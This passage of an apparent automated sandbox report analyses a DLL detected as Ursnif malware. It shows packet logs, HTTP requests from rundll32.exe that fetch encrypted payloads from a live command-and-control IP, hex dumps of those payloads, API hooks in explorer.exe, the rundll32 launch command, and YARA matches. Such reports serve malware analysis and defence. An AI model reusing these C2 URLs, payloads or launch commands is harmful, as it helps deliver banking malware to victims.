                                  May 25, 2022 11:18:01.478312969 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478337049 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478353977 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478358030 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478378057 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478380919 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478430033 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478451967 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478472948 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478498936 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478560925 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478708982 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.495136976 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.495171070 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.495186090 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.495240927 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.495348930 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.495397091 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496263027 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496299028 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496320009 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496335030 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496356964 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496359110 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496381044 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496390104 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496404886 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496421099 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496431112 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496445894 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496525049 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496548891 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496572018 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496587992 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496598959 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496612072 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496624947 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.496637106 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.496656895 CEST4977080192.168.2.4176.10.119.68

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 25, 2022 11:17:40.992937088 CEST8.8.8.8192.168.2.40x3723No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • 176.10.119.68

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.449770176.10.119.6880C:\Windows\SysWOW64\rundll32.exe
                                  TimestampkBytes transferredDirectionData
                                  May 25, 2022 11:18:01.167475939 CEST1383OUTGET /drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:01.458622932 CEST1389INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 186012
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df4496b208.bin"
                                  Data Raw: ea bd a2 1d 3e 3e d3 c3 36 c2 dd da f9 57 fc d3 3c f1 a8 93 93 9a cc 6b a2 b4 af 06 ab bc f8 6a 05 ce f7 96 f1 3f 92 c2 32 8e e8 dd cd 51 6d 66 73 db 65 23 2e 01 e2 ab d1 c0 2c 7a 98 76 f4 7c db 33 4f 47 9b 24 97 a1 68 86 78 b3 18 9a e0 58 ba 3a d9 a0 b3 e4 ed a3 a1 37 7e ad d4 3c 43 bd bd 87 f8 df 34 f6 66 6e 90 b2 b3 64 aa ab b2 74 71 82 14 a2 e0 67 25 ba bc cb d1 3c e7 39 fb 54 34 9e 24 19 e7 ae ea 73 93 a9 86 2a ed 26 2d c4 d8 05 31 6d a8 65 d4 e4 c6 08 11 b1 eb 4a 99 c7 4e 4b 51 cb 0c 94 14 90 e3 13 f2 a6 e1 0c 74 e7 a5 b7 7c 48 e6 da 7c 05 c4 bd fc cf a6 d8 ec 60 7a 35 23 aa 05 1c 1b 74 8b ac 40 9d 74 56 c8 13 e3 0e e1 23 1d 6a 7b 45 35 a8 08 41 72 20 62 65 70 03 a8 6d 19 d3 e8 78 ab eb 3c 90 9b de a0 93 90 e3 6d 51 e1 fb 4c 46 cd 28 aa 05 03 69 5e eb b1 b9 c8 69 c0 bb 3d ff 38 7a 5f bc bb 7b ce d2 d2 17 06 07 55 8b b1 51 3f 7e f3 df 05 d8 b0 ad da 1b 94 75 a1 b9 63 1d d1 a5 16 14 b5 59 f9 52 f0 ec 28 a9 53 6d bd 23 5b db 85 59 a8 d3 a6 76 98 0e b0 1d 57 8f 69 0e 87 bc 26 00 84 a4 5f 83 c3 4d 38 9e 3a 11 60 12 9c a3 7c 11 3c 36 d2 1d 29 c0 ef 89 ca 90 c9 b5 98 74 eb e9 ff e9 e4 c0 a3 7c 74 59 de 3a b3 bc 0c 13 48 ea 7e 08 80 f1 aa 94 73 9d 49 f5 87 4f 36 bf 42 b5 9a 68 36 fb 2b e5 d1 33 bf f9 d9 36 0c c6 bf 84 a3 48 a2 02 df a9 25 3c 25 d0 9d 0a 6e 11 84 24 91 8f b9 3a 9e f6 24 9f ce 71 b7 f8 84 87 81 91 78 fa 70 5e 73 8e de 97 9d 54 ba 72 b6 da b9 fe 3c bf d5 cd 31 eb 9b b2 5f dd 67 84 2a 13 f5 21 c7 67 df 1d 8a 41 7a 1e cf f5 4c 54 89 a0 b3 c4 af b5 e2 a9 ae 0a 94 e8 7a 92 4d d7 44 b9 87 dd 6b 5e ae eb ca 1a f8 a6 78 89 03 a1 61 8b 01 f0 80 89 5e 03 2d ed 92 a1 93 17 ed 95 5e c5 ff 84 0e 82 ae 1b 4b ee b3 75 3e 26 3e 2b be 39 29 6d 2d e7 92 a3 f9 f6 07 02 6f 9b 8e 36 73 69 15 fc e4 93 2e 07 a6 f4 96 76 61 96 9d 31 e9 17 40 2d 2c 9e da c5 f8 c0 06 63 7b a1 f1 fd c7 b7 90 a0 66 8a 89 3f 05 83 f4 a7 11 a1 6c ee f2 fd b0 2a 61 4a 6d ac 4f c7 c5 83 96 04 38 6f 1f c0 f4 d6 9c 43 9b a6 f8 98 98 41 56 a7 bf 62 e4 8f 4c 8f d9 33 89 de df bd 1c e7 75 47 56 fb 6e a7 c6 4e 41 11 45 91 45 9c 65 42 50 9a 50 b0 89 91 5d 9a 3d 6d 94 24 21 b0 23 c5 42 d0 ec 3c 73 12 1c 4b 77 16 c7 e6 fb ae 2f 99 5b 98 41 9a 0f 93 47 20 d3 c0 cc a1 26 fa 0e 0a 55 41 b3 00 55 8d b0 fb a9 ef 8e 6d fc 70 9c 26 04 b7 c0 45 b3 e4 43 94 bd 47 2b 41 4c 72 40 35 3f d8 2a e2 da 64 9e 70 d3 a6 c5 99 4b b8 78 f8 e3 7e 09 0a e3 ac 02 de 72 1a 94 51 8c e9 23 b6 74 72 b4 59 ea 6a 95 b8 25 0f 92 0c f5 f0 1d c3 72 c4 bc 33 0c d5 af b5 03 c6 b8 d8 a0 1a 3c d4 75 f1 c8 d6 e0 1b 85 fc bb 5d e9 65 13 f9 72 fb 1c f8 5b 14 d6 b2 f2 2b 3c d3 49 23 64 ba 0a 35 c6 7b 57 37 0b da 94 27 53 89 b4 b4 b0 49 f5 9a d8 d8 06 8e ab c0 c6 2d 0d f3 78 8b 28 66 b4 85 bc 35 14 e2 1c b9 46 20 81 05 1a ec 2d 7a 88 2e 6b 02 7e 9f 13 35 e8 fe 19 8f b0 5d 05 9b f2 e5 bb 53 fd 75 f0 f7 89 f7 c2 f5 19 e2 00 51 d5 a1 42 19 73 0f ff 48 80 f3 4d 01 ab 61 12 fb 06 1f 4e 65 4a 3c 07 ec 30 1c a5 bf c3 12 a8 0d c6 69 cc c0 4e 44 84 8c 1c 77 31 25 9f 83 8a 18 4a d3 e3 fc c3 e6 79 21 67 3e 95 66 d4 97 b2 65 64
                                  Data Ascii: >>6W<kj?2Qmfse#.,zv|3OG$hxX:7~<C4fndtqg%<9T4$s*&-1meJNKQt|H|`z5#t@tV#j{E5Ar bepmx<mQLF(i^i=8z_{UQ?~ucYR(Sm#[YvWi&_M8:`|<6)t|tY:H~sIO6Bh6+36H%<%n$:$qxp^sTr<1_g*!gAzLTzMDk^xa^-^Ku>&>+9)m-o6si.va1@-,c{f?l*aJmO8oCAVbL3uGVnNAEEeBPP]=m$!#B<sKw/[AG &UAUmp&ECG+ALr@5?*dpKx~rQ#trYj%r3<u]er[+<I#d5{W7'SI-x(f5F -z.k~5]SuQBsHMaNeJ<0iNDw1%Jy!g>fed
                                  May 25, 2022 11:18:01.636548042 CEST1588OUTGET /drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:01.915646076 CEST1591INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:01 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 238736
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df449db197.bin"
                                  Data Raw: 77 23 28 92 02 ab 89 1f 5f 83 9b 9c dd 81 51 65 54 10 d3 af 4b a6 45 ed 4e 1f a1 c3 01 69 7d 5a bf 5b 1e 82 db 9c 68 a5 6c 5f b0 75 f6 0f b7 c6 a1 bd 5b 3a a6 23 97 c6 03 43 dd 6d c5 b0 87 f4 4d 2f 4b 42 12 50 ad 5d dc 48 86 7c 01 77 de d8 da aa f9 03 76 23 01 98 69 2c 89 0d d3 12 46 ac 39 36 aa 08 9a ea 7b a2 bb dc a7 78 26 04 8f 03 9d 87 34 1c aa 22 b0 6e 13 c3 27 44 5f c7 24 c4 22 e2 5b 96 27 30 31 bb 1b 43 2a 2b e9 3d ff bf 61 0c 7f ea 6f 0e 70 66 5a db cb ba d0 e3 0b ba 9e 5b a1 9b a4 95 7b 3a af ed 6f 61 0b 44 d3 2f c6 1e 90 51 c3 c1 c5 89 c2 6d 83 89 b6 90 00 46 d8 4f 01 66 2b 12 85 9c 8f d3 8f 99 d3 46 32 cb 96 9a 6b dd cf fe 1c 68 56 94 4b 48 55 a4 e6 cf 41 29 29 d6 3f 70 a3 26 e9 4e 34 40 ee c9 1d 0e 80 a9 ee c7 7a 15 78 bb bf d4 ec 56 96 fc b3 5d f9 a6 3e 05 30 4f 9f 5c 66 3e 5d e6 1d c5 5a 9c 9d 23 2f b4 5d 1f b9 cd 29 a3 ad f1 1a cb e2 ab f1 81 3d 6d 7a 1d 3e 8a a3 3b e9 fb 87 8f fc 55 17 a1 b6 0c 89 45 2a 96 0b 51 b7 4d f6 46 12 eb 91 18 82 15 7a cf 3a 6f 8e 28 7e ff db 55 bb 2e f7 9c 64 d4 da c5 c4 bb cb 89 cb 43 9f dc 7c 48 7a e6 2d 12 da 8c f4 44 f2 d1 08 29 69 75 0e 2d b9 ce f8 bb 06 26 10 21 0c c0 5e 42 85 6b 23 78 75 ec 94 8a 35 30 17 2d 5c 3c 93 2f 93 f9 96 23 1c f8 b6 84 ef ea 0c aa ad 1c 54 4f ed f5 0e 13 b0 3c cf 20 9a e4 46 5f c4 1d ea 00 d9 51 80 9f e6 4a b6 f2 68 bb 5b dd 53 ba eb d3 26 db 92 4a d0 73 5e 9b 1b 33 dc ab 4e 0b 55 13 81 ae fd 77 49 bc 01 ec 4b f9 09 ea 60 dd ea 46 2a 25 13 25 b3 bb 18 3c 3f 70 76 5a 9a 93 33 45 46 3f f0 c7 5b 9d a3 49 72 e5 8c 25 f1 cf f0 a6 dd ce 07 77 b5 9f 3e ea fc 4e 8c af f2 8c 21 b5 b6 7f d7 66 a5 79 fd 81 e3 a0 dd 10 04 59 d0 1c 92 2d bc 1f 62 e4 f2 00 73 91 bc 71 bc 20 06 ce 41 6a 6a 9a ee b9 fa 54 72 92 00 0c 49 27 e1 ba f1 5c 1c 06 eb 35 1a 00 45 db e4 31 ab 88 96 b0 ff 26 89 2d fc c8 31 1b 64 18 49 7a 9c 1f 31 8a 99 ed 74 76 f7 46 43 91 5f 2b e5 a4 4f 81 43 83 2f 2b f0 58 b3 e7 26 b1 48 31 fd 47 12 51 d2 9f 37 4a cb b3 44 f1 c1 1d 0d 0d c0 ed e1 ba b1 e7 f8 a4 7e d5 9b c0 fb cc 8e db fd 21 90 fa 1b 7c 17 b9 00 5a 3f 65 0c 07 23 c6 2d 31 69 87 ad 3d 0c d1 dc 5d 1b da 7a 19 1d e9 8f 0c 84 2d b7 76 f3 12 78 41 32 32 7c d9 b9 67 bd 09 af d5 eb 22 86 ce 7a eb 59 f5 4c fe 59 7e b5 5e 72 9c 41 b3 0d b0 61 27 61 69 ce 8f 3d e6 89 c1 3e 80 d4 bf 05 80 c9 5c 15 2e b0 d1 89 c8 1a 18 8b e9 a0 14 1f 38 52 13 2f 4e 97 88 34 65 1a 1c a3 c7 03 94 1c fd f5 00 d4 0c 66 1b ff bc 33 3a ea 99 93 06 2f a1 af 76 09 dd 35 58 e4 b5 16 87 6a f1 a5 f4 46 8e 6f 0e 91 42 b5 f9 90 ee 4b b8 55 38 76 ad 9e 59 2a 4f 47 b6 a1 a7 88 91 de 66 63 c5 1a c6 b9 f5 2d 71 e2 34 af db 56 7a 7e 08 b2 e1 3d 45 1e b1 d2 f4 be ff e0 ca 97 16 6d d7 ac fa 3d d9 dd 2b 98 8c 30 d8 d8 da f5 6f 43 2a c1 e2 39 58 57 5c f3 84 d2 8a fc 41 e8 b6 86 b5 d6 a9 cc 11 26 e2 5c 78 11 68 89 b8 d7 de 59 36 54 af e2 df ca 98 1e bc cf 75 02 7b 79 f6 a2 6e 13 90 b1 92 fc b3 ce a4 e2 34 91 55 9e fa 3b 0f 72 ab a2 4d 99 44 12 d5 e9 35 3f 40 50 46 79 d5 46 6d f3 1c db ef 73 2a 9e 2e a3 e6 41 21 e8 98 b1 58 a4 50 23 08 6f 7c 86 1c 56
                                  Data Ascii: w#(_QeTKENi}Z[hl_u[:#CmM/KBP]H|wv#i,F96{x&4"n'D_$"['01C*+=aopfZ[{:oaD/QmFOf+F2khVKHUA))?p&N4@zxV]>0O\f>]Z#/])=mz>;UE*QMFz:o(~U.dC|Hz-D)iu-&!^Bk#xu50-\</#TO< F_QJh[S&Js^3NUwIK`F*%%<?pvZ3EF?[Ir%w>N!fyY-bsq AjjTrI'\5E1&-1dIz1tvFC_+OC/+X&H1GQ7JD~!|Z?e#-1i=]z-vxA22|g"zYLY~^rAa'ai=>\.8R/N4ef3:/v5XjFoBKU8vY*OGfc-q4Vz~=Em=+0oC*9XW\A&\xhY6Tu{yn4U;rMD5?@PFyFms*.A!XP#o|V
                                  May 25, 2022 11:18:02.070939064 CEST1844OUTGET /drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                  Host: 176.10.119.68
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  May 25, 2022 11:18:02.358270884 CEST1845INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Wed, 25 May 2022 09:18:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1870
                                  Connection: keep-alive
                                  Pragma: public
                                  Accept-Ranges: bytes
                                  Expires: 0
                                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                                  Content-Disposition: inline; filename="628df44a518cc.bin"
                                  Data Raw: 16 73 69 31 09 06 6d 67 f0 e8 32 67 f7 0a 83 93 06 b9 df f8 37 51 1c 9d 9c 07 14 8f dc 5f 0c a3 1b 40 e9 a6 4f 90 34 e9 29 61 44 14 68 59 01 07 9d 75 5f 14 0d 89 33 23 dc 16 33 c5 a1 b7 2a 2b 04 69 ac be 28 5a 15 ed 24 be 2e 0a d4 54 44 07 1c 3c a1 5f 82 95 2b ec 34 ec ff 8e 52 c3 14 cb 86 87 b4 22 9b 54 47 47 e2 b0 56 01 6f 6f ee 38 14 2f 39 e9 c3 5e b7 d2 86 a1 f7 28 2e 2b bc 8f 66 4a 99 ea 61 ce 3d eb 59 2b 32 ba 1f 6d 95 cd 1a 43 93 dd b1 e6 b8 a6 fe 00 03 2d 11 b4 6a 10 e7 19 e4 3f f5 bf 36 04 79 00 58 c4 d0 12 4c e0 35 90 db c0 87 eb 8a a8 93 2b a7 7c cf f0 68 31 3b 31 68 d3 d7 e9 64 1f 3e bf 79 bc 42 80 b8 c0 b0 c9 5a 23 dd 78 10 86 f8 30 44 87 ba 6c 75 5c d2 80 bd c3 14 03 9f 17 fd f7 f0 4a a6 4f da c2 53 be e6 99 70 40 bd a6 a1 d9 12 51 8e e9 8d 99 45 7b cd fd ba 10 b0 85 d3 0d cc 62 b0 82 02 8b d7 51 51 5c c7 7f 57 85 c7 1c 7d e8 4c c2 59 39 c7 f0 6d 72 2a 86 ef a4 4e c8 bc f0 c3 44 f1 e7 b7 d4 6a b1 c0 5d a0 f6 06 06 86 79 68 a0 04 75 95 68 64 35 a7 2b 10 c3 89 9b 92 05 4f a9 16 a1 6e a4 5b 65 f3 a0 d3 ee 2a 5f a7 a2 51 72 0f 3d 08 fe da b8 eb 54 5d 8b a1 4d af 3b ae a8 29 d1 fe 8f e8 ae b8 0e 78 84 1e f4 78 5d 35 39 2d 2b 9d a4 cd 46 ae a1 68 ea 17 21 0c 5b 39 91 53 97 61 5d af 25 af 50 60 48 02 fa 0d 74 fa de 26 e9 9b 15 5f 12 6c bd 24 fe 44 c8 bc 86 b6 34 a6 35 f5 52 c2 e9 d1 ca af 12 31 9a 6b aa a0 7a 79 95 b6 1e 8b 83 29 b7 b2 85 18 5d 31 3c 0b 29 f4 1c ea a0 d9 d9 84 d3 c5 4a 7f 11 44 20 e2 1e c4 27 8d 17 5a 5f a1 e8 1e cb 8f ab 3f a9 9e 2f dd 48 35 0b 41 9e 48 8a 4c 9b 15 1a d4 43 66 80 ca 89 34 a5 de b0 d5 fb 6c 45 30 ee 1b 22 3f 5e 42 ff 82 a5 97 e5 c5 d5 41 6e 55 ff f7 70 a9 ae da 49 ed fb c3 40 18 37 db 1e 14 0b 72 0c ca 7e 17 bc 5f ab ab 3f 50 8f 71 10 b8 94 56 5a 37 6e 4b 94 31 8c aa 32 dc c2 5a d1 67 8d 1c b4 f9 8b 51 e2 c2 3c 19 8b c5 ff 49 28 68 17 97 6e 26 73 0e 2b 97 a3 4d 77 5a 3e 92 19 b3 d7 5c a1 ec e4 cb 05 30 73 ee 02 04 30 fa e3 6e 87 78 20 2d c1 4a 06 0e 8e e6 fc 00 08 5e e2 a7 fe 72 4c d2 b7 4a 82 1e 37 d3 b4 6a ae b7 d0 27 2a 31 c9 22 03 9e f0 6d a1 8c f9 47 3e f2 d8 98 93 bb 3c 16 ae f6 25 f2 9b 91 e3 dc 57 df 9d cf a5 28 4f 75 c7 a7 c4 81 2f fc 7f 4a a1 df 87 68 bc f7 66 c1 2c 48 91 ce 0e 96 f9 68 1f a5 66 36 3b 39 14 02 be 06 aa aa b6 60 70 d6 fe 13 eb 16 ca 2f 1c 81 b6 e2 1d 04 1e 2e 53 4c 94 46 f8 56 ed 5e fd 3d 48 cd 87 b7 04 0a 31 b5 9e 3a f4 e8 45 30 8b fd 23 a4 01 8a 20 6a ae 83 02 f6 26 81 38 97 69 db 72 e2 83 c8 13 a4 38 f3 04 bb f6 53 a7 62 04 1d ed 09 6b 32 6e ec 8a 2c 93 81 78 90 73 16 0d 4e e5 b0 98 c1 33 fd 26 a6 07 7d e5 72 41 30 5c 00 ff 8a b7 2f 96 71 b6 f9 7b 8f 67 7d a1 cd ed 16 4d 16 cc a1 d6 9f c2 08 5b 62 ed c9 01 1a 4a 0b 71 72 be 28 be eb 5d ea 9b 23 60 bb 90 51 33 ea 0f e3 f6 5c 11 d0 4e 7f f2 69 49 8f 45 fa 88 86 36 3d 00 f8 ca 46 9c 18 c5 e3 38 2a a5 b4 04 f4 66 f6 29 cb ce 7b 91 f1 cd a4 e3 14 4f 52 ac 7f 45 d7 4b c5 58 40 43 98 c4 44 6e 78 13 b7 d8 84 35 8e 32 af b6 ff b0 78 97 60 91 1b 75 84 fd d8 4c d2 b2 32 2c 87 b3 18 e3 fc 42 2c 52 90 26 be 18 ba 3b 3c cd e8 f2 d1
                                  Data Ascii: si1mg2g7Q_@O4)aDhYu_3#3*+i(Z$.TD<_+4R"TGGVoo8/9^(.+fJa=Y+2mC-j?6yXL5+|h1;1hd>yBZ#x0Dlu\JOSp@QE{bQQ\W}LY9mr*NDj]yhuhd5+On[e*_Qr=T]M;)xx]59-+Fh![9Sa]%P`Ht&_l$D45R1kzy)]1<)JD 'Z_?/H5AHLCf4lE0"?^BAnUpI@7r~_?PqVZ7nK12ZgQ<I(hn&s+MwZ>\0s0nx -J^rLJ7j'*1"mG><%W(Ou/Jhf,Hhf6;9`p/.SLFV^=H1:E0# j&8ir8Sbk2n,xsN3&}rA0\/q{g}M[bJqr(]#`Q3\NiIE6=F8*f){OREKX@CDnx52x`uL2,B,R&;<


                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function NameHook TypeActive in Processes
                                  CreateProcessAsUserWEATexplorer.exe
                                  CreateProcessAsUserWINLINEexplorer.exe
                                  CreateProcessWEATexplorer.exe
                                  CreateProcessWINLINEexplorer.exe
                                  CreateProcessAEATexplorer.exe
                                  CreateProcessAINLINEexplorer.exe
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                  Processes

                                  Process: explorer.exe, Module: KERNEL32.DLL
                                  Function NameHook TypeNew Data
                                  CreateProcessAsUserWEAT7FF80250521C
                                  CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                  CreateProcessWEAT7FF802505200
                                  CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                  CreateProcessAEAT7FF80250520E
                                  CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                  Process: explorer.exe, Module: WININET.dll
                                  Function NameHook TypeNew Data
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT607B6B0
                                  Process: explorer.exe, Module: user32.dll
                                  Function NameHook TypeNew Data
                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FF802505200
                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT607B6B0

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:11:17:22
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\loaddll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll"
                                  Imagebase:0x11a0000
                                  File size:116736 bytes
                                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:1
                                  Start time:11:17:22
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                                  Imagebase:0x1190000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:2
                                  Start time:11:17:23
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                                  Imagebase:0x1360000
                                  File size:61952 bytes
                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
